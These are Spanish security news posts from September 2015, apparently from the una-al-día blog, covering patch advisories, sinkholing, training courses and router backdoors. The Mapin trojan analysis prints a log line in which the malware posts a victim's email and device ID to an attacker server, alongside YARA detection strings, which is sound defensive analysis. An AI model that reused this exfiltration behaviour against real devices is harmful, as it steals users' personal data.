miércoles, 30 de septiembre de 2015

Apple publica OS X El Capitan 10.11, Safari 9 e iOS 9.0.2

Apple ha publicado nuevas versiones de varios de sus productos más destacados. Destaca la publicación de una nueva versión de OS X (10.11 El Capitan) y Safari 9; junto con una actualización menor de iOS. Estas nuevas versiones solucionan un total de 147 vulnerabilidades.

Dada la gran cantidad de novedades y productos actualizados, vamos a realizar un breve repaso de las actualizaciones publicadas y problemas solucionados.

Se ha publicado OS X El Capitan 10.11, la última y esperada versión de OS X, que como suele ser habitual incluye interesantes novedades, así como mejoras de rendimiento y estabilidad del sistema. Además incluye la corrección de hasta 101 nuevas vulnerabilidades.

Las vulnerabilidades corregidas afectan a múltiples componentes: Address Book, AirScan, apache_mod_php, Apple Online Store Kit, AppleEvents, Audio, bash, Certificate Trust Policy, CFNetwork  Cookies, CFNetwork FTPProtocol, CFNetwork Proxies, CFNetwork SSL, CoreCrypto, CoreText, Dev Tools, Disk Images, dyld, EFI, Finder, Game Center, Heimdal, ICU, Install Framework Legacy, Intel Graphics Driver, IOAudioFamily, IOGraphics, IOHIDFamily, IOStorageFamily, Kernel, libc, libpthread, libxpc, Login Window, lukemftpd, Mail, Multipeer Connectivity, NetworkExtension, Notes, OpenSSH, OpenSSL, procmail, remote_cmds, removefile, Ruby, Security, SMB, SQLite, Telephony, Terminal, tidy y Time Machine.

Las actualizaciones también han llegado a Safari, el popular navegador web de Apple, que se actualiza a la versión 9 para OS X Mavericks v10.9.5, OS X Yosemite v10.10.5 y OS X El Capitan v10.11. Se solucionan 45 vulnerabilidades, la mayoría relacionadas con problemas en WebKit, el motor de navegador de código abierto que es la base de Safari. Y podrían ser aprovechadas por un atacante remoto para provocar condiciones de denegación de servicio o ejecutar código arbitrario al visitar una página web específicamente creada.

Por último, iOS se actualiza a la versión 9.0.2 que incluye la corrección de diversos problemas no relacionados directamente con la seguridad y soluciona una nueva vulnerabilidad. El problema corregido podría permitir a una persona con acceso físico al dispositivo acceder a las fotos y contactos desde la pantalla bloqueada.

Más información:

About the security content of OS X El Capitan v10.11

About the security content of Safari 9

About the security content of iOS 9.0.2


                                                                                                  
Antonio Ropero
Twitter: @aropero

martes, 29 de septiembre de 2015

Múltiples vulnerabilidades en productos Kaspersky

Se han anunciado múltiples vulnerabilidades en diferentes productos Kaspersky que podrían permitir a un atacante tomar el control de los sistemas afectados.

Las vulnerabilidades se deben a múltiples desbordamientos de búfer y de entero en el tratamiento de archivos comprimidos, que podrían permitir ejecutar código arbitrario con permisos del sistema. Algunos de los problemas ya resueltos por Kaspersky incluyen vulnerabilidades al tratar archivos Android DEX y documentos Microsoft CHM al descomprimir formatos UPX y Yoda Protector.

El problema fue reportado por Tavis Ormandy de Google Project Zero que confirma que debido a que los productos antivirus interceptan el tráfico de red y el sistema de archivos, bastaba con visitar un sitio web o recibir un archivo de correo para explotar la vulnerabilidad. Sin llegar a ser necesario abrir o leer el correo malicioso.

También confirma que muchas vulnerabilidades están aun sin corregir, aunque reconoce el trabajo de Kaspersky por solucionar y resolver los problemas que reportaron.

"Many of the reports I’ve filed are still unfixed, but Kaspersky has made enough progress […] and I’m happy to report that Kaspersky are rolling out some improved mitigations to resolve that."

Los productos afectados son:
Kaspersky Internet Security 2015
Kaspersky Endpoint Security 10 SP1MR1
Kaspersky Total Security 2015
Kaspersky Security for Virtualization 3.0

Kaspersky distribuyó la corrección a través de los módulos de autoactualización el pasado 13 de septiembre. Aunque como se señala en el aviso de Google aun hay vulnerabilidades por corregir.

Más información:

Kaspersky: Mo Unpackers, Mo Problems.

Kaspersky Lab has fixed a number of bugs


Antonio Ropero
Twitter: @aropero


lunes, 28 de septiembre de 2015

Elevación de privilegios a través de los drivers de NVIDIA

NVIDIA ha publicado un boletín de seguridad que soluciona una vulnerabilidad en sus controladores gráficos que podría permitir una elevación de privilegios.

La vulnerabilidad se debe a un error de falta de comprobación que podría causar una corrupción de la memoria del kernel. Un usuario local sin privilegios podría utilizar una llamada IOCTL (llamada de sistema que permite a una aplicación controlar o comunicarse con un driver de dispositivo) para escribir un valor entero de 32 bits almacenado en el controlador del núcleo a una posición de memoria especificada por el usuario, incluida la memoria del núcleo, y obtener privilegios adicionales y tomar control del sistema afectado.

El descubrimiento de este fallo de seguridad, al que se le ha asignado el identificador CVE-2015-5950, ha sido realizado por Dario Weisser, quien además ha enviado a NVIDIA una prueba de concepto que aprovecha dicha vulnerabilidad para causar una denegación de servicio. Dice disponer de otra prueba de concepto que logra la elevación de privilegios pero no ha sido mostrada a la empresa.

Se encuentran afectados los controladores para sistemas Unix y Microsoft Windows, y potencialmente todos los dispositivos GPU de NVIDIA, exceptuando la familia Tegra.

NVIDIA ha publicado varias actualizaciones de los controladores que solucionan este error. Se encuentran disponibles para su descarga desde la página oficial de NVIDIA y son las siguientes:

Para Unix:
    Release 304.128
    Release 340.93
    Release 352.41

Para Microsoft Windows:
    Release 353.82
    Release 341.81

Más información:

CVE-2015-5950 Memory corruption due to an unsanitized pointer in the
NVIDIA display driver


Juan José Ruiz

domingo, 27 de septiembre de 2015

Mapin, un troyano en casa

Hace unos días se publicó el anuncio del troyano Mapin. Este troyano según la firma Antivirus ESET ha estado presente en Google Play a finales de 2013 y finales de 2014, superando varios miles de descargas.

Para incitar al usuario a instalar la aplicación, ésta se hacía pasar por juegos muy buscados en el market de Google:
  • Hill Climb Racing
  • Plants vs Zombies
  • Highway Zombie
  • Super Maria adventure (sí, Maria!)
  • Zombies Highway Killer
  • Dr Driving - Street Driving
  • Super Hero Adventure

Tras estudiar algunas de estas muestras en nuestro laboratorio vamos a explicar su comportamiento:


Estructura de funcionamiento del instalador

El software está formado por tres componentes, el primero de ellos es el que se descargaba desde la tienda oficial de Android, también conocido como "Dropper" o "Instalador" (a la izquierda en la imagen superior).

Después de hacer un pequeño análisis estático de este archivo encontramos que la carpeta "assets" del APK contiene dos archivos cuyas cabeceras corresponden a archivos APK (o ZIP, que son exactamente iguales).

Después de ver esto, procedimos a estudiar la información que nos aportaba Koodous, empezando por los permisos de cada una de las aplicaciones. Primero vemos que el instalador solicita acceso tanto de lectura como escritura al almacenamiento externo (tarjeta SD), ver el estado de la red, Internet, tareas en ejecución y mensajes C2D.

URL Instalador en Koodous:



Posteriormente con el análisis dinámico manual veremos que usa estos permisos para almacenar las APKs directamente en la tarjeta SD y el estado de red para lanzar la instalación del troyano.

También veremos que los permisos del troyano tienen su razón, por ejemplo el uso de "C2D_MESSAGE" https://koodous.com/apks/cc95dc5b84d70de1b0a192f05e4c46813bfec3d6572750dbbad423a6946dc059:


También observamos que las URLs que contiene el APK en su interior resultan sospechosas, más adelante lo confirmaremos y explicaremos para qué las utiliza:


Procedemos con un análisis dinámico de la muestra para ver "grosso modo" cuál es su "modus operandi" y lo primero que nos llama la atención es, que tras la ejecución del "Dropper" en el dispositivo, este nos solicita instalar otra aplicación con el mismo nombre:

Imagen segunda instalación juego
Con esto intenta contentar al usuario de que la instalación del juego ha funcionado correctamente, aunque si se accede al mismo nos sale una pantalla como esta:


Recopilando, hasta el momento el usuario ha instalado el "Dropper" desde la tienda oficial de aplicaciones, y al ejecutarlo se ha vuelto a mostrar una pantalla de instalación (Imagen segunda instalación juego), que para un usuario común puede no resultar muy extraño. Tras esta instalación, en las aplicaciones del dispositivo aparece un único icono de "Plantas vs Zombies" y recordemos hay dos instaladas (el dropper y el juego ficticio).

En la siguiente etapa, el dropper va a intentar instalar el troyano. Para que sea más creíble para el usuario y piense que va a instalar una aplicación legítima, no lo hace inmediatamente, sino que espera a cuando haya un cambio de conectividad de red (recordar el permiso de cambio de red del que comentábamos al principio). Desactivar el modo avión, conectar el WiFi o 3G/4G activa este "broadcast" y entonces el sistema nos invita a instalar una actualización de "Google Play update" (que obviamente es falsa). Pueden comprobar el análisis en el siguiente enlace de Koodous:



Tras la instalación, el usuario no percibe información visible, pero el troyano se está ejecutando como servicio en “background”. Lo primero que hace es conectar con el servidor del atacante (recordemos las URLs que son visibles en Koodous) para enviar la información del dispositivo y el usuario:

V/AndroidHive GCM( 8733): Posting

'email=usermail@gmail.com&regId=APA91bFFOaavddFd33tZQDwmi2e6t-KmLbFI14cucUkLqDPHMRddcDDqFOy-5dHFrofySMJLl9IYl2wc1WQAWcoT1Re9BDq1BLb9a42BiIve-8IU2vsyR5yVopXpx6SWu1cFsrK3&name=null' to http://topgame24h.com/gcm/register.php

En esta petición envía el ID del dispositivo, el email del usuario y el nombre al servidor del atacante (URL actualmente desactivada), mediante una petición POST. Posteriormente se conecta con los servidores de Google para registrarse en el servicio GCM. El id del desarrollador (en este caso el fabricante del malware) es "138675150963":

V/GCMRegistrar( 8733): Registering app com.system.main of senders 138675150963

Imagen del código GCM del desarrollador

Desensamblando el código dex (compilado de Android) a Java podemos ver las funciones que el atacante usa para controlar los dispositivos. Esto lo hace enviando comandos a través de los servidores GCM de Google:


Como casi todas las muestras antivirus, una vez se analiza, es interesante sacar una firma. Una firma de virus, resumiendo, es una serie de expresiones regulares que deben cumplirse para categorizarlo dentro de esa familia. Existe una herramienta libre llamada Yara (cuya comunidad está creciendo a pasos agigantados) y que se puede usar en Koodous abiertamente.

En primer lugar vamos a crear la regla para el dropper. La manera más sencilla es extraer cadenas de texto características del mismo, y analizando hemos visto 3 de ellas que pueden ser perfectas:
":Write APK file (from txt in assets) to SDCard sucessfully!"
"4Write APK (from Txt in assets) file to SDCard  Fail!"
"device_admin"

Así que podemos crear la siguiente regla en Koodous, que en el momento de escribir esta entrada detecta nueve aplicaciones fraudulentas.

En cuanto al troyano (Google Play update), basándonos en unas cuantas muestras, se han extraído las siguientes cadenas que pueden ser muy características:
"138675150963" //GCM id
"res/xml/device_admin.xml"
"Device registered: regId ="

La primera de ellas es el código GCM del desarrollador, la segunda un archivo que no suelen tener el resto de APKs y el tercero es parte de una cadena que el atacante usa para depurar. La regla completa está en Koodous https://koodous.com/rulesets/851 con ocho detecciones en el momento de escribir esta entrada.

Más información:

una-al-dia (06/07/2015) Koodous: inteligencia colectiva para proteger tu Android

El Troyano Mapin consigue infectar sistemas Android a pesar de las medidas de seguridad de Google

Antonio Sánchez

sábado, 26 de septiembre de 2015

Cisco soluciona vulnerabilidades en IOS e IOS-XE

Cisco ha publicado su paquete bianual de alertas de seguridad para el software Cisco IOS. En esta ocasión la firma distribuye tres avisos que solucionan un total de cuatro vulnerabilidades en sus routers y switches.

El primero de los boletines publicados, y el de mayor gravedad, hace referencia a una vulnerabilidad (con CVE-2015-6280) en la implementación del protocolo SSH versión 2 (SSHv2) de los dispositivos Cisco IOS e IOS XE que podría permitir a un atacante remoto sin autenticar evitar la autenticación de usuario.

La vulnerabilidad solo afecta a dispositivos configurados para usar autenticación de usuario basada en RSA. El atacante debe conocer un nombre de usuario válido y la clave pública de dicho usuario.

Otra alerta reside en una vulnerabilidad (CVE-2015-6282) en el tratamiento de paquetes IPv4 que requieren servicio NAT (Network Address Translation) y MPLS (Multiprotocol Label Switching) de software Cisco IOS XE que podría permitir a un atacante remoto sin autenticar provocar el reinicio de los dispositivos afectados (Cisco ASR 1000 Series, Cisco ISR 4300 Series, Cisco ISR 4400 Series y Routers Cisco Cloud Services 1000v).

Por último, dos vulnerabilidades en dispositivos Cisco IOS e IOS XE con IPv6 Snooping activo podrían permitir a un atacante remoto sin autenticar provocar condiciones de denegación de servicio (CVE-2015-6278 y CVE-2015-6279).

Al igual que otros fabricantes Cisco realiza publicaciones conjuntas de las actualizaciones de sus productos Cisco IOS de forma periódica. Estas se realizan el cuarto miércoles de los meses de abril y septiembre de cada año.

Cisco ha publicado actualizaciones gratuitas para corregir todas las vulnerabilidades.

Más información:

Cisco Event Response: September 2015 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication

Cisco IOS and IOS XE Software SSH Version 2 RSA-Based User Authentication Bypass Vulnerability

Cisco IOS XE Software Network Address Translation Denial of Service Vulnerability

Cisco IOS and IOS XE Software IPv6 First Hop Security Denial of Service Vulnerabilities



                                                                                                  
Antonio Ropero
Twitter: @aropero


viernes, 25 de septiembre de 2015

Nueva versión del sistema operativo del reloj Apple Watch

Cuando apenas lleva unos meses en el mercado Apple ha publicado una nueva versión del sistema operativo WatchOS 2, destinado a su reloj inteligente (smartwatch) conocido como Apple Watch, con la que se solucionan hasta 39 vulnerabilidades.

Esta nueva versión WatchOS 2 también incluye múltiples mejoras y funciones, más esferas, aplicaciones más avanzadas y rápidas, y mejores opciones de comunicación.

Las vulnerabilidades podrían tener muy diversos efectos entre otros podrían permitir a un atacante interceptar conexiones cifradas SSL/TLS, rastrear la actividad del usuario, obtener la clave privada, la ejecución de código arbitrario al tratar un texto o una fuente maliciosamente creada o la ejecución de código arbitrario de múltiples formas.

Los problemas corregidos afectan a Apple Pay, Audio, Certificate Trust Policy, CFNetwork, CoreCrypto, CoreText, Data Detectors Engine, Dev Tools, Disk Images, dyld, GasGauge, ICU, IOAcceleratorFamily, IOKit, IOMobileFrameBuffer, IOStorageFamily, Kernel, Libpthread, PluginKit, removefile, SQLite y tidy.

Esta actualización se debe instalar a través del iPhone. El reloj tiene que tener al menos un 50% de la batería cargada y estar conectado al cargador. Conectar el iPhone a la WiFi y mantenerlo cerca del reloj durante la actualización. En el iPhone, se debe abrir la aplicación Apple Watch y abrir Mi reloj > General > Actualización de software.

Más información:

About the security content of watchOS 2

watchOS 2

Actualizar el software del Apple Watch

Antonio Ropero
Twitter: @aropero



jueves, 24 de septiembre de 2015

Sinkholing. Controlando al enemigo

Recientemente publicamos en Una-al-día nuestra colaboración con ESET para la monitorización y cierre de una red de robo de información en Latinoamérica. Sobre este tema hemos recibido muchas consultas pidiendo información sobre el sinkhole que realizamos. Hoy vamos a explicar qué es un sinkhole, cómo se realiza y cómo sacar provecho de esta técnica.

Un sinkhole, a grandes rasgos, consiste en la toma de control de una red de equipos infectados. "Un sinkhole de DNS, permite a investigadores, fuerzas de seguridad y otras entidades, redirigir el tráfico de los equipos infectados, para evitar que los cibercriminales tengan el control y puedan robar la información que hay en ellos".

Funcionamiento de un sinkhole
Todo malware espía que se precie, en algún momento de su existencia, ha de comunicarse con su propietario (no tiene porque ser su creador) para hacerle llegar la información de la colecta del día. Es en el punto en el que la información sale del propio proceso, en el que se encuentra más expuesta a ojos ajenos. Y aquí es donde entra en juego el uso del "sinkholing". La primera fase consiste en la toma de control de los puntos de conexión del malware con el atacante; es decir, el núcleo de su infraestructura. Una vez se controlado el flujo del tráfico, se pasa a la fase de recolección y tratamiento de la información capturada por el "sinkhole".

Con respecto a la toma de control de la infraestructura, existen distintas formas de llevarla a cabo. Una de las formas más sencillas es la de apuntar dominios no registrados por los atacantes hacia servidores bajo el control de los investigadores. ¿Y cómo va el propietario de la botnet a olvidar registrar un domino? Uno de los casos más típicos de esta casuística se da cuando el malware utiliza la denominada técnica de DGA ("Domain Generation Algorithm") para que, con la frecuencia deseada (diariamente, semanalmente...) se conecte a dominios totalmente nuevos y evitar así la caída de la red por la desactivación de su infraestructura original. Sin embargo, esta fortaleza, si no se toman las precauciones necesarias, puede ser su debilidad, ya que, en caso de ser descubierto el algoritmo de generación de nombres de dominio, podría dejar una puerta abierta a "los buenos". Otras formas de controlar una red de malware pasan por arrebatar la propiedad de los dominios o servidores "oficiales" de la red.

¿Qué se puede obtener del sinkholing? 

Una vez se poseen los nodos de conexión del malware y conociendo el protocolo de comunicación entre el equipo infectado y el servidor, la variedad de acciones que pueden llevarse a cabo dependen de las funcionalidades de interacción que posea el malware y de la información recolectada. Existen casos ideales en los que desde el propio panel de control de la red se puede enviar la orden de desinfección de las máquinas víctima. La recolección de la información obtenida por los agentes que infectaron a las víctimas suele, por norma general, vulnerar la privacidad de las víctimas. Aún así, tal y como se hizo con Liberpy, se puede obtener mucha información sin llegar a acceder a información sensible.

Tras ponerse ESET en contacto con Hispasec y compartir toda la información referente a la amenaza, procedimos a la toma de control de su infraestructura con un doble objetivo. Por un lado, que los dueños de la red dejasen de recibir la información que pudiera estar siendo recolectada de los equipos infectados. Por otro, el sinkholing de los dominios de Liberpy. Para obtener el control de los dominios, el departamento de Antifraude de Hispasec se puso en contacto con los registradores de los dominios para obtener su control. Una vez controlados los dominios, se procedió a redirigir todo el tráfico desde las máquinas infectadas hacia los servidores de nuestros compañeros de ESET. La toma de control de Liberpy, como bien se explica en el informe de ESET, descartaba el contenido que pudiera afectar a la privacidad de las víctimas. Los objetivos de la acción llevada a cabo eran varios: dimensionar el tamaño de la red, establecer un perfil geográfico de la amenaza para ayudarnos a comprenderla mejor y conocer las versiones de los sistema operativos afectados.

"Es importante remarcar, que el sinkhole sólo escuchaba los primeros 600 bytes de la comunicación. De esta manera, ningún o de los datos que Liberpy roba de los bots infectados fue almacenado. Los esfuerzos se dedicaron a entender cómo se comunicaban los equipos, su periodicidad y distribución de la botnet."

Muchas veces a la hora de anular un troyano o una botnet, se tiende por la vía rápida que es dar de baja dominios o direcciones afectadas, lo que anula por completo los efectos en cualquier equipo infectado. Sin embargo, la técnica del sinkhole permite a los investigadores ir un paso más lejos y no solo anular los efectos maliciosos del malware en cuestión, sino que además facilita la obtención de información sobre cómo se realiza el ataque, sus efectos e incluso hasta sobre los atacantes.

Más información:

una-al-dia (10/09/2015) Hispasec colabora para desmantelar la Operación Liberpy de robo de información en Latinoamérica

Operación Liberpy: keyloggers en Latinoamérica

Operación Liberpy:Keyloggers y robo de información en Latinoamérica



Laboratorio Hispasec

miércoles, 23 de septiembre de 2015

Mozilla publica Firefox 41 y corrige 28 nuevas vulnerabilidades

Mozilla ha anunciado la publicación de la versión 41 de Firefox (y de Firefox ESR 38.3), junto con 19 boletines de seguridad destinados a solucionar 28 nuevas vulnerabilidades en el navegador.

Hace poco más de un mes que Mozilla publicó la versión 40 de su navegador. Ahora acaba de publicar una nueva versión que incorpora nuevas funcionalidades y mejoras. También publica una versión actualizada de Firefox ESR (versión de soporte extendido) destinada a grupos que despliegan y mantienen un entorno de escritorio en grandes organizaciones como universidades, escuelas, gobiernos o empresas. Como nueva medida de seguridad destacable se puede señalar que WebRTC requiere Perfect Forward Secrecy (PFS).

Por otra parte, se han publicado 19 boletines de seguridad (del MSFA2015-96 al MSFA2015-114). Cuatro de ellos están considerados críticos, cinco altos, nueve moderados y uno de gravedad baja; que en total corrigen 28 nuevas vulnerabilidades en el navegador.

Las vulnerabilidades críticas residen en un uso después de liberar memoria al utilizar un shared worker con IndexedDB (CVE-2015-4510), otra vulnerabilidad de uso después de liberar memoria con elementos HTML multimedia en una página durante la manipulación de script (CVE-2015-4509), diversos problemas de corrupción de memoria en el motor del navegador (CVE-2015-4500 al CVE-2015-4501) y  dos fallos en libGLES de la librería gráfica ANGLE, empleada por WebGL y OpenGL en sistemas Windows (CVE-2015-7178 y CVE-2015-7179).

Además, también se han corregido otras vulnerabilidades importantes como la posible manipulación de archivos arbitrarios por un usuario local a través del actualizador (CVE-2015-4505), un desbordamiento de búfer al descodificar vídeo WebM (CVE-2015-4511), ejecución de código arbitrario debido a que determinados scripts pueden evitar protecciones y cambiar propiedades inmutables en JavaScript (CVE-2015-4516), dos errores en el tratamiento de peticiones Cross-origin resource sharing (CORS) (CVE-2015-4520) y ocho vulnerabilidades descubiertas a través de la inspección de código.

La nueva versión está disponible a través del sitio oficial de descargas de Firefox:
o desde la actualización del navegador en Ayuda/Acerca de Firefox.

Más información:

Firefox Notes
Version 41.0

Mozilla Foundation Security Advisories

una-al-dia (12/08/2015) Mozilla publica Firefox 40 y corrige 22 nuevas vulnerabilidades

Security Advisories for Firefox ESR


Antonio Ropero
Twitter: @aropero

martes, 22 de septiembre de 2015

Nueva actualización para Adobe Flash Player

Adobe ha publicado una nueva actualización para Adobe Flash Player, que en esta ocasión soluciona 23 vulnerabilidades que afectan al popular reproductor. Los problemas podrían permitir a un atacante tomar el control de los sistemas afectados.

Las vulnerabilidades afectan a las versiones de Adobe Flash Player 18.0.0.232 (y anteriores) para Windows, Macintosh, y navegadores Chrome, Internet Explorer y Edge; y Adobe Flash Player 11.2.202.508 (y anteriores) para Linux. También afecta a Adobe AIR .

La mayoría de los problemas que se corrigen en este boletín (APSB15-23) permitirían la ejecución de código arbitrario aprovechando una vulnerabilidad de confusión de tipos, cinco vulnerabilidades de uso de memoria después de liberarla, dos desbordamientos de búfer, corrupción y desbordamiento de pila y siete fallos de corrupción de la memoria.

Esta actualización también incluye controles de validación adicional para asegurar que Flash Player rechaza contenido malicioso desde llamadas JSONP de APIs vulnerables. Se incluye una mayor protección ante corrupciones de longitud de vector. También se resuelven vulnerabilidades que permitirían la obtención de información sensible.

Los CVE asignados son CVE-2015-5567, CVE-2015-5568, CVE-2015-5570 al CVE-2015-5582, CVE-2015-5584, CVE-2015-5587, CVE-2015-5588, CVE-2015-6676 al CVE-2015-6679 y CVE-2015-6682.

Adobe ha publicado las siguientes versiones de Adobe Flash Player destinadas a solucionar las vulnerabilidades, y se encuentran disponibles para su descarga desde la página oficial:

  • Flash Player Desktop Runtime 19.0.0.185
  • Flash Player Extended Support Release 18.0.0.241
  • Flash Player para Linux 11.2.202.521
Igualmente se ha publicado la versión 19.0.0.185 de Flash Player para Internet Explorer, Edge y Chrome (Windows y Macintosh).
También se han actualizado AIR Desktop Runtime, AIR SDK, AIR SDK & Compiler a la versión 19.0.0.190 (Windows, Macintosh, Android e iOS).

Opina sobre esta noticia:

Security updates available for Adobe Flash Player



Antonio Ropero

Twitter: @aropero

lunes, 21 de septiembre de 2015

Problema de validación de certificados en VMware vCenter Server

VMWare ha publicado actualizaciones para su productos vCenter Server (versiones 5.5 y 6.0). Estas nuevas versiones corrigen un problema de validación de certificados.

VMware es un software que permite ejecutar diferentes sistemas operativos en un mismo PC de forma virtual. Entre otras aplicaciones, VMware es muy utilizado en seguridad informática por la versatilidad que ofrece. Por ejemplo, se suele utilizar de forma habitual en la investigación del malware, ya que permite ejecutar y analizar los especímenes en entornos virtuales controlados.

El problema corregido, con CVE-2015-6932, reside en que VMware vCenter Server no valida el certificado cuando se vincula a un servidor LDAP empleando TLS. Un atacante que consiga explotar esta vulnerabilidad podrá interceptar el tráfico entre vCenter Server y el servidor LDAP y conseguir información sensible.

Se han publicado las siguientes actualizaciones para corregir el problema en las versiones afectadas:
VMware vCenter Server 6.0 u1
VMware vCenter Server 5.5 u3
disponibles desde:

Más información:

VMware vCenter Server updates address a LDAP certificate validation issue



Antonio Ropero

Twitter: @aropero

domingo, 20 de septiembre de 2015

Nuevos cursos en Criptored Formación, cuarto criptoreto y el grupo de LinkedIn

A finales del mes de agosto Criptored comenzó una nueva etapa de cambios modificando su sitio web y creando un grupo profesional en la red social LinkedIn, habiendo éste superado los 1.500 miembros en 3 semanas.

Tal y como comentamos recientemente en Una-Al-Día la figura del miembro de la red temática y su correspondiente ficha desaparecerán en los próximos meses. Sólo quedará -como constancia- una lista de todos aquellos profesionales que han ayudado durante 16 años a formar esta comunidad científica, apareciendo solamente sus nombres, universidad o empresa y país, habilitando para ello una página en una zona del sitio web que hemos denominado Comunidad, actualmente en fase de desarrollo y actualización. Por lo tanto, si este es tu caso, te animamos a que si aún no lo has hecho crees una hoja profesional en LinkeIn y te des de alta en nuestro grupo.

La comunicación de Criptored con miembros y simpatizantes se realizará desde este grupo en LinkedIn y desde una lista de distribución que estamos creando.

En septiembre, además de la publicación de la píldora 28 del proyecto Thoth y de la segunda lección del curso de Criptografía con Curvas Elípticas de nuestros colegas de la Universitat de Lleida en el MOOC Crypt4you, tenemos tres noticias que podrían ser de tu interés.

1) Segunda edición del curso práctico online de intrusión en sistemas y metasploit en profundidad con Pablo González, los viernes 2, 9 y 16 de octubre de 2015 de 16:00 a 20:00 horas.

2) Quinta edición del curso online de Especialización en Seguridad Informática para la Ciberdefensa, del lunes 19 de octubre al lunes 23 de noviembre de 2015, con los siguiente expertos invitados: David Barroso, Chema Alonso, Alejandro Ramos, Javier Rascón, Pablo González, Sergio de los Santos, Rafael Sánchez, Pedro Sánchez, Antonio Guzmán, Raúl Siles, José Picó y David Pérez.

3) Cuarto criptoreto creado por Alfonso Muñoz con premio de una plaza gratuita en la quinta edición curso online de Ciberdefensa.

Más información:

una-al-dia (05/09/2015) Criptored se actualiza y adapta a los nuevos tiempos

Criptored - Seguridad informática, Formación e Investigación (LinkdIn)

una-al-dia (06/09/2015) Publicada la píldora formativa Thoth 28 "¿Cómo funcionan los algoritmos DES y 3DES?"

una-al-dia (07/09/2015) Curvas elípticas en seguridad web, segunda lección en el MOOC Criptografía con curvas elípticas de Crypt4you



Dr. Jorge Ramió, Dr. Alfonso Muñoz

Editores de Criptored

sábado, 19 de septiembre de 2015

Nuevas versiones de BIND 9

ISC ha publicado nuevas versiones del servidor DNS BIND 9.9.8 y 9.10.3, destinadas a solucionar cuatro vulnerabilidades que podrían causar denegaciones de servicio a través de consultas especialmente manipuladas.

El servidor de nombres BIND es uno de los más usados en Internet. Creado en 1988, en la universidad de Berkeley, actualmente es desarrollado por el ISC (Internet System Consortium). BIND se encuentra disponible para una amplia gama de sistemas tanto Unix como Microsoft Windows.

El primer fallo, con CVE-2015-5722, reside en el tratamiento incorrecto de llaves DNSSEC mal construidas que puede provocar una caída de debido a un fallo en "buffer.c". Un atacante remoto podría provocar esta condición mediante consultas especialmente manipuladas que requieran una respuesta desde una zona remota que deliberadamente contenga una llave maliciosa.

Por otra parte, con CVE-2015-5986, el tratamiento inadecuado de respuestas específicamente manipuladas puede provocar un fallo de comprobación de límites en "openpgpkey_61.c" que causará la caída de named.

También se soluciona una vulnerabilidad, con CVE-2015-5477, en el tratamiento incorrecto de consultas que podría provocar un fallo en message.c. Por último, en servidores configurados para realizar validación DNSSEC, se podría provocar un fallo en respuestas desde un servidor específicamente configurado (CVE-2015-4620).

Estas versiones también incluyen nuevas características, cambios en funcionalidades y múltiples correcciones de fallos no relacionados directamente con la seguridad.

Se recomienda actualizar a las versiones más recientes BIND 9.9.8 y BIND 9.10.3 disponibles en
Hay que señalar que la rama 9.9 de BIND ya se encuentra bajo soporte extendido que finalizará en junio del año que viene.

Más información:

BIND 9.9.8 Release Notes

BIND 9.10.3 Release Notes



Antonio Ropero
Twitter: @aropero



viernes, 18 de septiembre de 2015

Los administradores que no amaban a sus routers Cisco

El pasado 15 de septiembre se publicó un informe de la compañía FireEye en el que mostraban los detalles de un caso de infección de routers Cisco que merece la pena analizar.

¿Qué es un router? Una cajita con el tamaño suficiente para estorbar en cualquier lugar donde la pongas, (rack del CPD, detrás de un mueble, encima del armario…), llena de cables para que tropieces y que permite que tu red interna se conecte a otras redes internas, entre otros esquemas, para intercambiar información ¿Ingenioso, verdad? Desde pequeñas oficinas (SOHOs) hasta routers frontera de una organización considerable tienen un elemento en común: los instalas, configuras, compruebas que hay conexión y te olvidas de ellos. "Fire and forget" como se diría en la jerga militar.

Ese "y te olvidas de ellos" (voz haciendo eco en tu cabeza) tiene una importante contraprestación: que alguien, en la oceánica inmensidad de la red, saque partido de ese olvido.

Tal vez la cifra parezca ridícula. FireEye detectó 14 routers Cisco con una versión modificada de su firmware original que permite el acceso a la red interna a través de una puerta trasera. 14 routers no son muchos routers, prácticamente nada, una mota de polvo en una tormenta de arena. A lo largo de los días la cifra subió a 79 más, pero como se apunta desde Arstechnica es posible que algunos positivos sean honeypots desplegados por otros investigadores. No es una opción descartable.

De cualquier modo las cifras no deben apantallar la carga explosiva de los hechos. Que una infección no alcance cotas significativas no se traduce en que tengas inmunidad frente a ella.

Hagamos un inciso antes de poner nuestros ojos en el microscopio para ver de cerca al bicho. Seguramente algunos lectores que administren routers Cisco estén en un momento de tensión innecesaria. No se trata de una vulnerabilidad específica de Cisco, no hay ningún gusano suelto (de otro modo las cotas sería exponencialmente superiores). Se sospecha que los autores se están aprovechando de aquellos routers que poseen credenciales de fábrica o contraseñas comunes para acceder al dispositivo. El porqué de Cisco y no otros es posiblemente debido a que este opus diabólico está diseñado exclusivamente para IOS, el sistema operativo de Cisco. Así que si administras Cisco y cambiaste las contraseñas por unas robustas, tranquilo, de lo contrario, si no las cambiaste o pusiste unas débiles…tal vez deberías hacer algunas comprobaciones.


SYNFul Knock

Routers infectados por país. Fuente: zmap.io
El "implante" o SYNFul Knock, como lo llaman en el informe de FireEye, consiste en una imagen de Cisco IOS modificada para permitir el acceso al dispositivo a través de una puerta trasera y capacidad modular para que el atacante pueda cargar funcionalidad acorde al tipo de acción que pretenda realizar.

Lo realmente curioso son los esquemas de comunicación que se han montado los atacantes para interaccionar con el dispositivo. Más que un canal encubierto básicamente se trata de "ofuscar" el modo en el que se accede a las puertas traseras mediante la manipulación de paquetes TCP estándar. Hablamos de ofuscar porque una simple captura de tráfico entre atacante-dispositivo hace saltar las alarmas si te fijas en los detalles. Naturalmente, lo osado es dar con los motivos para hacer tal captura de tráfico.

Llamativo que las puertas traseras solo puedan ser activadas a través de puertos estándar pero sin cifrado, léase: HTTP (a secas), telnet y consola. Se descartan los servicios HTTPS y SSH. El HTTP solo es usado por los atacantes para activar ciertos módulos. Crean un paquete TCP especial, lo envían hacia el puerto 80 y el firmware infectado se encarga de activar el módulo malicioso seleccionado. Si lo que desean es acceder directamente a un terminal de comandos IOS, el sistema de puerta trasera observa si las credenciales son válidas y corresponden a las de un atacante, activando entonces las funciones de puerta trasera (una shell). De lo contrario, las pasa al verdadero sistema de autenticación para que el usuario legítimo no observe nada un comportamiento extraño.

